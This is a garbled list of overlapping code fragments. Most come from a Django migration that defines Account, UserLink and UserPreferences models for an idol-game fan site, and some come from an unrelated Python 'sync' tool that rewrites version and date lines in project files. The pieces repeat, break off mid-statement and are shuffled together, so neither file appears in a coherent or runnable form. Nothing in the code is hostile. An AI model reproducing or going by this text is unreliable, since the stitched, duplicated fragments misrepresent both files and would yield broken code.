'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links',", "might take up to 24 hours to update your location on the map.',", "verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. It might take up to", "'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link',", "to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True,", "'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ },", "(b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer',", "your ID, tap the settings icon, then tap \"Profile\". Your ID is the", "and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in.", "models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences',", "operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20,", "of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True,", "find your ID, tap the settings icon, then tap \"Profile\". Your ID is", "Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'),", "to 24 hours to update your location on the map.', max_length=200, null=True, verbose_name='Location',", "choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'),", "('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID',", "single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[", "primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs',", "5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30,", "blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS',", "b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram',", "'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')),", "import unicode_literals from django.db import models, migrations import django.db.models.deletion from django.conf import settings", "requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap", "Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol", "blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index',", "Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)),", "(b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'),", "migrations import django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies =", "number you see on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts',", "links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. It", "migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os',", "('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index", "b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write", "b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone", "(b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'),", "}, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write", "formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live", "URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])),", "and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post", "often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3,", "(b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on", "with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other',", "You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The", "up to 24 hours to update your location on the map.', max_length=200, null=True,", "models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...',", "migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False,", "models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'),", "alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you", "auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can add formatting and links", "<filename>web/migrations/0002_account_userlink_userpreferences.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import", "see on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ],", "}, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20,", "settings icon, then tap \"Profile\". Your ID is the number you see on", "models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'),", "friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID,", "settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations", "iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True,", "verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True,", "fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10,", "bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform',", "whatever you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description',", "migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'),", "(3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel(", "'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans',", "modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150,", "fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank',", "Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. It might take", "b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username", "null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), ]", "models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following',", "day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id',", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id',", "migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want.", "name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs',", "] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname',", "(b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'),", "'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True,", "(b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id',", "null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER',", "verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example:", "2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs',", "(b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID',", "# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models,", "'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ],", "b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github'," ]
[ "set version = \"' + str(self.context.version) + '\" %}'}, ) __all__ = [\"Sync\"]", "= \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{%", "/ self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ =", "{ \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format(", "self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items():", "import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool):", "key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None:", "def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return", "Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run", "\": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__", "Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__)", "\"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ =", "path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line", "k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines)", "\"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None:", "\"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self)", "__future__ import annotations import logging from pathlib import Path from typing import Sequence,", "dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: str):", "'{% set version = \"' + str(self.context.version) + '\" %}'}, ) __all__ =", "def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str])", "def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", {", "-> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ =", "line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\")", "self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs(", "context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def", "version = \": '{% set version = \"' + str(self.context.version) + '\" %}'},", "\"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ =", "dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe()", "\": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs(", "replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for", "in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line)", "None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \":", "'__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"),", "\": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), },", "None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in", "from __future__ import annotations import logging from pathlib import Path from typing import", "= \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \":", "import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger =", "__init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self,", "return [str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key) def", "v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if", "for s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path:", "= dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init()", "Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self,", "_Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path: Path)", "self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__", "= \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ),", "_Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context", "new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if", "in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not", "else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path))", "if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if", "{\"{% set version = \": '{% set version = \"' + str(self.context.version) +", "from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class", "<filename>tyrannosaurus/sync.py \"\"\" Sync tool. \"\"\" from __future__ import annotations import logging from pathlib", "if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__", "= \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) ->", "pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger", "= [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k):", "\"\"\" Sync tool. \"\"\" from __future__ import annotations import logging from pathlib import", "logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project", "self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run)", "to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project /", "-> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in", "self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")),", "import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def", "for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines =", "new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def", "path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path", "{}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\",", "'__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, )", "sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s)", "in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace:", "= \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def", "context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path,", "Sync tool. \"\"\" from __future__ import annotations import logging from pathlib import Path", "encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path /", "str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k,", "= _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self,", "new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote", "\"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set", "/ \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__", "has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) ->", "Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for", "None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version", "logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run", "= logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context", "logging from pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context import", "from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context,", "context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path:", "self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \":", "set version = \": '{% set version = \"' + str(self.context.version) + '\"", "[str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self,", "break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to", "replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines():", "self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"' +", "Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in", "if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines,", "typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync:", "path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines", "= \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")),", "self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines =", "self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: str): return", "context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str,", "self.context = context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context", "\": '{% set version = \"' + str(self.context.version) + '\" %}'}, ) __all__", "\"\"\" from __future__ import annotations import logging from pathlib import Path from typing", "path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for", "self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ =", "self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"'", "fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{%", "logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context =", "self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) ->", "Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s", "return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines", "new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self)", "def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = []", "class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run =", "def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run def", "= \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"):", "-> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set", "import annotations import logging from pathlib import Path from typing import Sequence, Mapping", "self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key)", "bool): self.context = context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]:", "annotations import logging from pathlib import Path from typing import Sequence, Mapping from", "\"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__", "replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run:", "_Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key:", "Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context:", "fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__", "}, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version", "Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets]", "for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break", "tool. \"\"\" from __future__ import annotations import logging from pathlib import Path from", "self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"' + str(self.context.version)", "import logging from pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context", "'__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ =", "= context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context =", "s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path,", "= \": '{% set version = \"' + str(self.context.version) + '\" %}'}, )", "dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path: Path) ->", "), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None:", "if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version =", "line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else:", "not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"):", "str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path)", "\"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\")", ") def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version =", 